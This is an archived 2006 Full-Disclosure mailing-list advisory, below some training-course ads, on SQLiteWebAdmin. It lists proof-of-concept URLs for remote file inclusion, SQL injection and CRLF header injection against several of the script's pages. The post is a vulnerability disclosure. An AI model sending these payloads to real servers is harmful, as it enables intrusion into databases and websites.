Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]

[Full-disclosure] SQLiteWebAdmin multiple Vulnerabilities

Subject: [Full-disclosure] SQLiteWebAdmin multiple Vulnerabilities
Date: Sat, 29 Jul 2006 23:43:39 -0500
Discovered by Sirdarckcat from elhacker.net

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
==============================================

SQLiteWebAdmin is a simple script for managing a
DataBase.

It has several security bugs.

==============================================
Remote File Inclusion:


PoC: http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/ ?

==============================================

SQLinjection:

PoC:
http://www.server.com/table_editfield.php?table='+[SQL]

==============================================

And also Header Injection:


PoC: http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value


==============================================

Att.
Sirdarckcat
elhacker.net


-- Att. SirDarckCat@GMail.com

http://www.google.com/search?q=sirdarckcat

Attachment: sqlitewebadmin.txt
Description: Text document

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] SQLiteWebAdmin multiple Vulnerabilities, SirDarckCat <=